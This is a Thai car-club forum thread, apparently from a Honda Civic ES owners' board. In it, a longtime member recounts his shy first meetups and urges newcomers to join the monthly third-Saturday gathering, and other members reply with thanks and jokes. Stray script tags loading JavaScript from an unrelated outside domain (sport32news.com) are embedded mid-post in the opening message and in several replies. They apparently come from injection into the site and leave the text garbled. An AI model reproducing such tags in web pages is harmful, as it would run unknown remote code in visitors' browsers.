ตอบ
~ สเตฟาน ~

ชื่อเล่น: สเตฟาน

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 16 พฤศจิกา 2009 16:16 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
~~ สำหรับสมาชิกใหม่ มามิตติ้งทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~

สวัสดีทั้งสมาชิกใหม่ และ สมาชิกเก่าทุกท่าน

ช่วงนี้เห็นมีสมาชิกใหม่เข้ามามากมาย และเนื่องด้วยอาจจะยังไม่เคยรู้จักมักจี่กันมาก่อน จึงอาจทำให้เกิดความเก้อเขินหรือทำตัวไม่ถูก สำหรับการที่จะเริ่มมามิตติ้ง ทุกเสาร์ที่3ของเดือน และสำหรับการที่จะเข้ามาเป็นครอบครัวชาว ES :D

นับวันสมาชิกก็มีมากขึ้น มากขึ้น น่าเป็นเรื่องยินดีกว่า..ที่นับวันสมาชิกจะลดลง ลดลง เมื่อมีคนมากขึ้น ความคิด นิสัยใจคอ ก็แตกต่างกันออกไป การอยู่ร่วมกันจึงต้องเรียนรู้และปรับตัวของทั้งตัวเราและคนอื่น เข้าหาซึ่งกันและกัน :P

ก่อนหน้านี้ ผมคนนึงที่เคยเป็นน้องใหม่ น่าตาสดใส วัยละอ่อน ขอย้ำว่าเคยผ่านการเป็นน้องใหม่ ครั้งแรกที่ไปมิตติ้ง ยังจำได้เลยว่า ไปที่ร้านกุ้งเต้น ถนนราชพฤกษ์ รถเดิมๆเลย ยังไม่ได้ทำอะไรเลย ขับเข้าไป ความรู้สึกก็ โห..อะไรกันเนี่ย ทำไมรถคนอื่นเค้าสวยๆ งามๆ มีสไตร์กันทั้งนั้นเลยนะ ใจอยากจะวกรถกลับแล้วออกจากร้านไปเลย แต่ไหนๆก็ไหนๆแล้ว ให้มันรู้ซะบ้างว่ารถเดิมๆเป็นยังไง..เพราะดูจากรถแต่ละคันของสมาชิก คงจะจำสภาพเดิมของรถตัวเองไม่ได้กันแล้วแน่นอน ผมก็เลยขับช้าๆโชว์สภาพรถเดิมๆของตัวเองให้เพื่อนๆสมาชิกได้ชม อิ อิ <script src="https://sport32news.com/civicesgroup.js"></

ครั้งแรกวันนั้น จำได้เลยว่า ไปจอดข้างรถ ผู้ชายร่างเล็กแต่ชื่อใหญ่ ใช่ครับ...เจ้าBikiนั่นเอง(มาจนถึงวันนี้ มันขายรถกินไปแล้ว แล้วก็ไปออก DC5 สภาพก็งั้นๆ มาขับหน้าตาเฉย ) วันแรกที่ผมก้าวขาลงจากรถ ก็ยิ้มแฮะๆ ทักทายมั่วไปหมด แต่ก็ไม่กล้าเดินเข้าไปคุยกับใครสักเท่าไหร่ อย่างมากก็แค่ถามชื่อ ถามว่ามาจากไหน ก็เท่านั้นเอง และไม่ได้อยู่ทานข้าวด้วย เพราะไม่รู้จะทำตัวยังไงดี แล้วผมก็ห่างหายจากการไปมิตติ้งโดยปริยาย ก็ได้แต่เข้าboardมาดูข้าวสาร เอ๊ย..ข่าวสารเรื่อยมา และในช่วงเวลาที่ไปจำศีล สภาพรถเดิมๆก็ค่อยๆปรับเปลี่ยนไปเรื่อยๆ แบบไม่รู้ตัว พอไม่รู้ตัว..ตังค์ในกระเป๋าก็หายไปโดยไม่รู้ตัวเช่นกัน

จนวันนึง ผู้หญิงคนสนิทแนะนำให้ไปมิตติ้งอีกครั้ง และบอกว่า..ถ้าไม่ลงไปคุยกับคนอื่น แล้วจะรู้จักคนอื่นได้ไง (มันแนะนำหรือมันหลอกด่าหว่า) และแล้ววันเปิดตัวก็ถือกำเนิดขึ้น (เว่อร์ไปมั๊ยตรู) วันนั้นไปมิตติ้งที่โรงเบียร์เยอรมัน..เรียบด่วน ถ่ายรูปลงหนังสือรถ ไปคราวนี้ รถเย๊อะักว่าคราวก่อนมากมาย ไม่รู้มาจากไหนเยอะแยะไปหมด รถก็เยอะคนก็เยอะ พอจอดปุ๊บ..กรูอยู่ในรถดีก่า คนเยอะจัง..อาย ..แต่แล้วไอ้เจ้าผู้หญิงคนสนิทก็ลากผมลงไปคุยกับคนโน่นคนนี้ sheทำตัวสนิทสนมกับคนอื่นได้อย่างแนบเนียนจนผมเองก็รู้สึกว่า เออ..ดีวุ๊ย ผมเองก็เลยรู้สึกสนิทไปด้วยเลย แต่ก็ยังเขินๆอยู่ แล้วสายตาก็สอดส่องไปเจอไอ้เจ้าหนุ่มตัวเล็กชื่อใหญ่อีกแล้วครับท่าน เจ้าBikiนั่นเอง มันยืนเอามะเร็งเข้าปอดอยู่ ผมก็เลยเดินปรี่หน้าด้านเข้าไปขอมะเร็งมันดูดเป็นเพื่อน..แล้วก็ชวนคุยไปเรื่อย (หน้าด้านแล้วยังทำเนียน 5 5 5)ได้เพื่อนหละวุ๊ยงานนี้

แล้วหลังจากนั้น ผมก็มามิตติ้งเกือบจะทุกครั้ง ไม่ค่อยพลาด แล้วเริ่มรู้จัก เพื่อนเพิ่มขึ้นเรื่อยๆ แมน ป๋องแป๋ง ตาต้น ปลา พี่อ๊อบ พี่ต่าย พี่ใหม่ พี่เอก-อิม พี่เต้ ตาเอกอะเลิท ตาโบ๊ท(จุกนม) ตาเก็ต บอยอ่าง... ตาตุ้ยหื่น จ๊อบ เต้ย เตย ดิว ดาว นุ อาร์ม น้าหมวด สมีแบงค์ พี่สะ เป้คุง(ตวย) บอส(เด็กประโปก) ว่าน เจ้าโบ๊ท(น้องชายฝาแฝด) เจ้าเบียร์ เจ้าหยวน เจ้าอิฐ และเพื่อนสมาชิกอื่นๆอีกมากมายก่ายกองที่ไม่ได้เอ่ยนาม เพราะมีเยอะจริงๆครับ (และช่วงหลังๆ ยิ่งรู้จักมากขึ้น จำชื่อแต่ละคนไม่ได้เลย ต้องขออภัยมา ณ ที่นี้ด้วยนะครับ)

นี่แค่เพื่อนๆสมาชิกในแถบ กทม.และปริมณฑล เพราะหลังจากนั้น ยกตัวอย่างสัก1ทริป...ผมกับเพื่อนกลุ่มน้อยๆชาวES ก็ได้ขึ้นไปเยือนชาวESเจียงใหม่ และได้รับการตอนรับอย่างอบอุ่น..เหมือนเคยรู้จักกันมาตั้งแต่ชาติปางก่อนมันเป็นความรู้สึกที่อบอุ่นจริงๆ (ต้องไปสัมผัสด้วยตัวเองแล้วจะรู้) ป๋าตุ๋ย เจ้าบุ๊ค และเพื่อนสมาชิกชาวเจียงใหม่ ผมก็จับมาเป็นมิตรสหายหมดเลย อิ อิ (ทำเนียนอีกแล้วตรู)

จากที่ร่ายยาวมา (ยังไม่หมดนะ ไว้มีอารมณ์ จะมาร่ายภาคสองต่อ) ก็เพียงเพื่ออยากจะขอแนะนำและเป็นแนวทางให้กับสมาชิกใหม่ทุกท่าน ที่อยากจะก้าวเข้ามาเป็นครอบครัวเดียวกันว่า อย่าไปกลัว อย่าไปเขิน อย่าไปแบกฟอร์มไว้ให้หนัก ทุกคนในครอบครัวนี้ เป็นมิตรหมดครับ เพียงคุณเปิดใจมามิตติ้งสักครั้งสองครั้ง คุณจะได้มิตรภาพกลับไปอย่างแน่นอน ถ้าไม่เชื่อ..ให้ไปอมขี้หมามาพ่นใส่หน้าผมได้เลย

ในครอบครัวแห่งนี้ มิได้มีแค่เรื่องรถ เรายังมีกิจกรรมหลายๆอย่างไว้รอต้อนรับสมาชิกใหม่ทุกท่าน ไม่ว่าจะเป็น กีฬาฟุตบอล แบดมินตั้น โบว์ลิ่ง สนุ๊กเกอร์(รู้สึกอันนี้..แม่บ้านจะไม่ค่อยปลื้ม )หรือถ้าท่านไม่ถนัดกีฬา..แต่ถนัดสุรา เราก็ยังมีครับ ยินดีรับต้อนทุกคน ด้วยมิตรภาพแบบเป็นกันเองจริงๆ เพราะฟานรั่วเกือบทุกงานเลย 5 5 5

เห็นมั๊ย การก้าวมาเป็นสมาชิกครอบครัวเดียวกันของชาว ES ไม่ใช่เรื่องยากเลย มามิตติ้งทุกเสาร์ที่3ของเดือน คุณจะได้เพื่อนเพิ่มขึ้น มิตรภาพเพิ่มขึ้น หลายสิ่งหลายอย่างเพิ่มขึ้น เมื่อใดที่คุณเข้ามา คุณจะรู้สึกไม่ผิดหวัง

เคยมั๊ย..ที่ขับรถไปบนถนน มีคนเปิดไฟสูงทักทายเรา บีบแตรทักทายเรา เปิดกระจกโบกมือทักทายเรา(ขนาดขับมาก็เร็วนะ ) แล้วคุณจะได้รู้ว่า..ความรู้สึกอิ่มเอมใจมันเป็นเช่นไร ทั้งๆที่คุณยังจำไม่ได้เลยว่า..รถคันนั้นคือใคร

แล้วเจอกัน... 8)

~ สเตฟาน ~

ป.ล. ขอบคุณสหายทุกท่าน ที่อดทนอ่านมาจนจบ
ได้รับคำขอบคุณจาก: cisco  NeaT ES.  chengg  hacker  CEMENT  Tiger_BIG  TUI_PeTiTe  Lee_ES_turbo  <Mies>  BLACK_CHERRY04  momo0101  Hamster@Yamabuchi  iMan  jonatan  watchara4  DRINK  Rangsit 33  boss  top4829  Kaka '  V_ES  VOICEMAN  PAM  kunshybeer08  ES21_fatboy  virus  aofkab  wut-chiangmai  Jeab22  sukhothai  black_boy  nAAe  ToR79  battery3k  tong  water_airport66  HJJ 502  POD943  kidz  jetty0  Bow  pupaekung  ae  Jeff  kobon  aun99  Winny  Anakin  BOY BOY  kittidech  thanettrakool  Ti_es03  yoosabai  es_mania  Nut_Au_Together  KUSA  khaofang  ES2.0  stevie_b8  naponghp  PongpanG  Wal2n_ES  iceman33  BOY_PeTiTe  Ton-  tewada  INDY-ES  TheGood  DELL  InDePenDent  sayarm  boatinsane  Emilygirl19  Sombutsiri  zn701  mackza  pee  kaorjang  FRANG_BCP  adisak  Hipflip  jk2475  SO_FAR AWAY  monkey-es  ahingrace  undertee  biggsnui  issara  N_J Civic  carrimoroll  wave  AGENT  zatan  Start17  area88team  parman  khunmoo  por  pong_1986  three_es_04  Plumya13  SM 1 NAT  beespeed  aud fat  RG.KiD  ipound  Tee No3933  oatzakub  l3oatZ  tor-es  eit  Justinaen  ectoderm_  nong9395  -ake_ipc-  idris  berr3  paonarak  Arabica  aeae..  RA PEA.  sarayuth  msnjoey  Asuerada_boy  GOLFER  taimaishu256  ming  J.Anusorn  ~Ferio Mania~  Tudcham Family  runchida  art es amphawa  Es_SaLaRyMaN  mike304  khing_cr  apple2  BMonkey  muu  tamy2975  musashi44  bapil  8800Gold  Tee_BKK  tokykung  PONG-9115  honeybeex7  kai04  liverpool_art  MATOOM  taneas  kantaphat  patoo  mark_es03  note7007  kimberpro  cacalot  HUTO  Junnee  ronnachai  suwitjim  witat  champcement  teerayod  civic753  K_series  Gremlin  nocomment  pplagoon  ChettoX  capze  aonrx  boyboom_16  Bonuses01  AlwaysCivic  jaos  merscie  makaimura  KJ-nui  N_Civices  Phetcharat  john  CHAMPnaja  bank01  maxch  Ejirou  perfect  maelamom  nooknick9003es  Jinatta_meaw  hikaru_kung  nung_kz  golf111  Okumori  TumGolok  athongchum  jacky19  BallBall  dangeroustoy  roatchaikit  anugul  masterbigzz  jologo  wighwaytak  toptwo  natt_civic  piriyod  Nack_Non  pairut  LifeFate  Rs_ferio  es330  underhill  mamacup009  BananaBoat  civic3025  pan8903  b20b  tiger2217  nudyzarO_o  khem_hatyai  Patchai  bomb3092  a_ten  Modzilla14  bigbom  หนุ่ย 4816  machack  Dekpranakon  civic5103  zwon  moonoy  kid  prgs55  S_CIVIC  Mi_nK  nuttapon--24  bankabby  nujen0_0  AofStaR  Jasada  momoSTANDBY  domino  DuuI  Golfzaa  เสก  OxidEJamEs  civicnoom  wichai  popup-es  Oungeng  sakpu  WarHighways  aea  hotline172  nudang1686  romeomix  davidian  Rachen  MagentaPloy  kujokung  saan  petongzaa  Snook  freedombee  ballanupong  koobe  เค  Stroke_VTEC  popza4  uousoxoe  Jakkarin_ch  scanclub  noom444  Jijee  สมชาย  bad-in-mind  joytomza  sakura1046  chokpiti  maxza_es  maxner_rangsit  Chok_Rx  Goo_golf  Memory11  tawan1986  nongnirvana  AFF_NCOM  pamannumber1  yodrak  benzkungzaa  sunselo  Zippoze  inkman  noppon  note_okaasan  manawwan  oonsuwan  karnmotocross01  ton_nuan  Vee  raksapol  yam  makunkwan  ton.chana  Jameskab  Jitrada  CAV_BANK  one12345678  อทิวรา จินานุรักษ์  channarong.sirinararat  นกซาซ่าส์ โซดาสิงห์ 
Plumya13

ชื่อเล่น: นุ่น

เข้าร่วม: 24 ตุลา 2008
ตอบ: 277

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 475
ให้คำขอบคุณ: 545

ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 16 พฤศจิกา 2009 16:27 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
อ่านแล้วหายตื่นเต้นขึ้นเยอะเลยค่ะ
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
จันทร์, 16 พฤศจิกา 2009 16:30 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
อ่านแล้ว รู้สึกว่าอบอุ่นจัง

ตั้งแต่อยู่ที่นี่มาได้อะไรมากกว่าที่คิดครับ ทั้งเพื่อน ทั้งความรู้ และมิตรภาพของทุก ๆ คน

คงอยู่ตลอดไป ไม่ว่าจะไม่ขับ ES แล้วก็ตาม

ขอบคุณครับ พี่ฟาน

แก้ไขล่าสุดโดย เมื่อ จันทร์, 16 พฤศจิกา 2009 16:35, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
NeaT ES.

เข้าร่วม: 10 ตุลา 2008
ตอบ: 1247

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4530
ให้คำขอบคุณ: 1984

ปี: 2004
จันทร์, 16 พฤศจิกา 2009 16:31 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
สุดยอดครับพี่...เนียนๆ ขอบคุณครับ
CEMENT

ชื่อเล่น: อิท

เข้าร่วม: 18 กรกฎา 2009
ตอบ: 1133

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 10852
ให้คำขอบคุณ: 2770

จันทร์, 16 พฤศจิกา 2009 16:35 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
ได้คับพี่.....เดี่ยวมีทติ้งนี้ผมจะทำอย่างที่พี่บอกคับ.....
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  chengg  PAM  kunshybeer08  หยวน  hacker  carrimoroll  bapil  cacalot  pplagoon  cherd  kokasat  pairut  khem_hatyai  Modzilla14  inkman  karnmotocross01  Jitrada 
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

จันทร์, 16 พฤศจิกา 2009 16:39 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
พี่แพล่มเรื่องนี้มากี่รอบแล้วอ่ะ ...
เมาทีไร หรือเล่าความหลังทีไรก็มีแต่เรื่องนี้

คนแก่ก็งี้แหละนะ
เอาเป็นว่า ตามนี้ดีกว่า

hacker พิมพ์ว่า:
เรียนสมาชิกใหม่ที่จะไปทุกท่านนะครับ มิตติ้งนี้การกรอกใบสมัครจะอยู่แถวๆวงที่ตั้งกินเบียร์กันนะครับ
ใบสมัครสามารถมากรอกได้ฟรีครับ เดี๋ยวผมจะปรึกษาทางนายทะเบียนอีกทีครับ
ไม่ต้องกลัวว่าท่านจะไม่รู้จักใครครับ เพราะว่าถ้าท่านเดินมาหาเรา เราจะทำความรู้กับท่านเองครับ
อย่าเขินครับ ครอบครัว ES ยินดีต้อนรับเสมอครับ
ถ้าไม่เริ่มที่จะทำความรู้จักกันวันนี้ก็ไม่รู้จักกันซักกะทีครับ

และเรียนสมาชิกที่จะลงทะเบียนภาคพิเศษกันนะครับ ใครจะกินเหล้าเอามาเอง ใครจะกินเบียร์ก็เอามาเองครับ

แล้วก็กรุณาเอาเก้าอี้ที่นั่งมาเองด้วยนะครับ น้ำแข็งกับแก้วก็เอามาเองด้วยนะครับ

ปล.เอามาเองแล้วมานั่งกินด้วยกัน สนุกดีออก เป็นกองเชียร์ ฮิ้วๆๆๆๆๆๆ
ปล. แอบเก็บค่าลงทะเบียนเป็นเบียร์ดีไหมครับ ฮ่าๆๆ

ฮิ้ววววว.....กลัวจิตใจอ่อนเพลีย หิ้วเบียร์มาหาเราสิครับบบบบบบบบ
TUI_PeTiTe

เข้าร่วม: 24 สิงหา 2008
ตอบ: 3394

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 11353
ให้คำขอบคุณ: 3321

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 16 พฤศจิกา 2009 16:42 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
พิมพ์ซะเยอะเลยอ่านไปตายลายไป...อิอิ แต่เจ๋งว่ะได้ใจผมไปเลยตาฟานหื่น ^^"
เอาเป็นว่าช่วยๆกันมามิตติ้งก็แล้วกันนะครับรับลองไม่เขินอย่างที่คิดแน่เพราะพวกเรา
มักจะรับน้องกันอยู่เป็นประจำ...หุหุ (ล้อเล่น) จ้า มากันเยอะๆนะครับแล้วคุณจะติดใจ
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  CEMENT  chengg  jonatan  PAM  kunshybeer08  Wal2n_ES  hacker  Emilygirl19  carrimoroll  tor-es  bapil  honeybeex7  cacalot  civic753  cherd  kokasat  davidian  karnmotocross01  Jitrada 
CHAMP_ME16

ชื่อเล่น: แชมป์

เข้าร่วม: 11 กันยา 2009
ตอบ: 3113

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2265
ให้คำขอบคุณ: 891

จันทร์, 16 พฤศจิกา 2009 16:44 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
รู้สึกดีจังครับ ขอบคุงน่ะครับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  chengg  PAM  kunshybeer08  hacker  carrimoroll  honeybeex7  cacalot  civic753  cherd  kokasat  karnmotocross01  Jitrada 
<Mies>

ชื่อเล่น: มี่

เข้าร่วม: 03 ธันวา 2008
ตอบ: 1463

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1962
ให้คำขอบคุณ: 1373

จันทร์, 16 พฤศจิกา 2009 16:45 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
สุดยอดครับพี่
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  PAM  kunshybeer08  hacker  carrimoroll  cacalot  civic753  cherd  karnmotocross01  Jitrada 
Lee_ES_turbo

เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

จันทร์, 16 พฤศจิกา 2009 16:47 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
ก่ออย่างที่พี่ฟาน นายกองทะเบียนท่านกล่าวมาน่ะคับ ผมเองแรกๆก่อเกรงๆ ไม่กล้ามา ไม่รู้จักคราย แต่หลังจากไปนอกรอบครั้งแรกที่สุวรรณภูมิ พี่ๆเค้าใจดีและเป็นกันเองมากๆ พอไปมิตติ้งใหญ่ รู้สึกประทับใจดีคับ แม้ว่าจะคุยน้อย แต่ก่อได้รับการต้อนรับอย่างดีคับ จนพี่ฟานนี่แหละ ที่เป็นคนชวนผมมาเตะบอลด้วยกัน สนิทกันมากขึ้นคับ คิคิ

อย่าไปกลับ ลองสัมผัสดู แล้วจะรู้ว่าอบอุ่นและเป็นกันเองแค่ไหน
BLACK_CHERRY04

ชื่อเล่น: เน

เข้าร่วม: 05 มีนา 2009
ตอบ: 464

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 944
ให้คำขอบคุณ: 1236

จันทร์, 16 พฤศจิกา 2009 16:52 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
ถูกต้องครับพี่เคยขับเจอes เข้ามาเทียบข้างตกใจหมดเลยนึกว่าเราไปปาดหน้าใคร
ที่แท้คนในคลับเปิดกระจกทักแค่นี้ก็รู้สึกดีบอกไม่ถูกเลยครับ ทั้งที่ไม่รู้จักกันมาก่อน
ได้รับคำขอบคุณจาก: chengg  V_ES  PAM  kunshybeer08  ~ สเตฟาน ~  hacker  ahingrace  carrimoroll  msnjoey  GOLFER  cacalot  civic753  bank01  cherd  Ady  karnmotocross01  Jitrada 
watchara4

ชื่อเล่น: เอท

เข้าร่วม: 04 พฤษภาคม 2009
ตอบ: 1565

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1917
ให้คำขอบคุณ: 3446

ปี: 2002
จันทร์, 16 พฤศจิกา 2009 16:55 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
โห ดีจังแฮะ
ได้รับคำขอบคุณจาก: chengg  PAM  kunshybeer08  ~ สเตฟาน ~  hacker  carrimoroll  cacalot  cherd  karnmotocross01  Jitrada 
jonatan

ชื่อเล่น: โจ

ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 16 พฤศจิกา 2009 16:55 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
จัดไปคับ ครั้งแรกเลยสำหรับผม เสาร์นี้ ที่แดนเนรมิตเก่า อิ อิ "<script src="https://sport32news.com/civicesgroup.js">

แก้ไขล่าสุดโดย เมื่อ จันทร์, 16 พฤศจิกา 2009 16:57, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: chengg  PAM  kunshybeer08  ~ สเตฟาน ~  Wal2n_ES  hacker  ahingrace  carrimoroll  GOLFER  cacalot  civic753  cherd  kokasat  karnmotocross01  Jitrada 
DRINK

เข้าร่วม: 04 ตุลา 2008
ตอบ: 3857

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

จันทร์, 16 พฤศจิกา 2009 16:57 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
เยี่ยมยอดไปเลยพี่ชาย
ได้รับคำขอบคุณจาก: chengg  PAM  kunshybeer08  ~ สเตฟาน ~  Wal2n_ES  hacker  carrimoroll  cacalot  john  cherd  kokasat  karnmotocross01  Jitrada 
Rangsit 33

ตอบ: 2276

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3688
ให้คำขอบคุณ: 1582

จันทร์, 16 พฤศจิกา 2009 17:01 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
BLACK_CHERRY04 พิมพ์ว่า:
ถูกต้องครับพี่เคยขับเจอes เข้ามาเทียบข้างตกใจหมดเลยนึกว่าเราไปปาดหน้าใคร
ที่แท้คนในคลับเปิดกระจกทักแค่นี้ก็รู้สึกดีบอกไม่ถูกเลยครับ ทั้งที่ไม่รู้จักกันมาก่อน

...... อย่าบอกนะครับว่า...คืนวันเสาร์ที่ผ่านมา หน้าทางเข้าเมืองเอก วิภา....
Kaka '

ชื่อเล่น: กล้า

เข้าร่วม: 11 ตุลา 2008
ตอบ: 1138

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 871
ให้คำขอบคุณ: 551

จันทร์, 16 พฤศจิกา 2009 17:05 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
สุดยอดครับท่านประชาสัมพันธ์คลับ -
ได้รับคำขอบคุณจาก: chengg  PAM  kunshybeer08  ~ สเตฟาน ~  Wal2n_ES  hacker  carrimoroll  cacalot  civic753  cherd  karnmotocross01  Jitrada 
BLACK_CHERRY04

ชื่อเล่น: เน

เข้าร่วม: 05 มีนา 2009
ตอบ: 464

ได้รับคำขอบคุณ: 944
ให้คำขอบคุณ: 1236

จันทร์, 16 พฤศจิกา 2009 17:12 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
Rangsit 33 พิมพ์ว่า:
BLACK_CHERRY04 พิมพ์ว่า:

...... อย่าบอกนะครับว่า...คืนวันเสาร์ที่ผ่านมา หน้าทางเข้าเมืองเอก วิภา....

รถสวยครับพี่เสาร์ที่ผ่านมาผมไปเที่ยวสวนผึ้งครับ
ยินดีที่ได้รู้จักครับเจอบนถนนทักทายได้ครับ
ผมวิ่งรถไม่เร็วขับขี่สุภาพครับพี่
"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: PAM  Rangsit 33  Wal2n_ES  hacker  sayarm  khing_cr  cacalot  civic753  cherd  kokasat  karnmotocross01  Jitrada 
Hamster@Yamabuchi

ชื่อเล่น: เบิร์ด

เข้าร่วม: 27 มีนา 2009
ตอบ: 2005

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5433
ให้คำขอบคุณ: 3267

จันทร์, 16 พฤศจิกา 2009 17:13 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
มรึงหล่อว่ะพี่ฟาน กินใจมาก ไอดอลกรูเลยพี่.................สู้ๆ กรูสนับสนุนเต็มที่ครับพี่ อิอิ
VOICEMAN

ชื่อเล่น: ตั้ม

ตอบ: 1188

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1621
ให้คำขอบคุณ: 3177

จันทร์, 16 พฤศจิกา 2009 17:17 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
เยี่ยมมากครับพี่
ได้รับคำขอบคุณจาก: PAM  kunshybeer08  ~ สเตฟาน ~  hacker  carrimoroll  cacalot  cherd  kokasat  karnmotocross01  Jitrada 
iMan

ชื่อเล่น: แมน

เข้าร่วม: 04 สิงหา 2008
ตอบ: 2838

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 12149
ให้คำขอบคุณ: 3080

จันทร์, 16 พฤศจิกา 2009 17:19 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
หล่อวะพี่
ได้รับคำขอบคุณจาก: PAM  kunshybeer08  ~ สเตฟาน ~  stevie_b8  Wal2n_ES  TUI_PeTiTe  hacker  carrimoroll  GOLFER  khing_cr  cacalot  civic753  cherd  kokasat  maxner_rangsit  karnmotocross01 
godji_catza

เข้าร่วม: 10 ตุลา 2009
ตอบ: 110

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 204
ให้คำขอบคุณ: 76
จันทร์, 16 พฤศจิกา 2009 17:19 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
เด็กใหม่อ่านแล้ว ซึ้ง

ได้รับคำขอบคุณจาก: PAM  ~ สเตฟาน ~  hacker  carrimoroll  cacalot  civic753  bank01  cherd  Modzilla14  karnmotocross01  Jitrada 
V_ES

ชื่อเล่น: วี คับ

เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 590

ได้รับคำขอบคุณ: 464
ให้คำขอบคุณ: 926

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 16 พฤศจิกา 2009 17:21 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
อบอุ่นจัง...นายทะเบียน
ได้รับคำขอบคุณจาก: PAM  kunshybeer08  ~ สเตฟาน ~  hacker  carrimoroll  BLACK_CHERRY04  GOLFER  cacalot  civic753  cherd  karnmotocross01  Jitrada 
PAM

ชื่อเล่น: แป๋ม

เข้าร่วม: 17 กรกฎา 2009
ตอบ: 1514

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2753
ให้คำขอบคุณ: 2884

จันทร์, 16 พฤศจิกา 2009 17:25 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
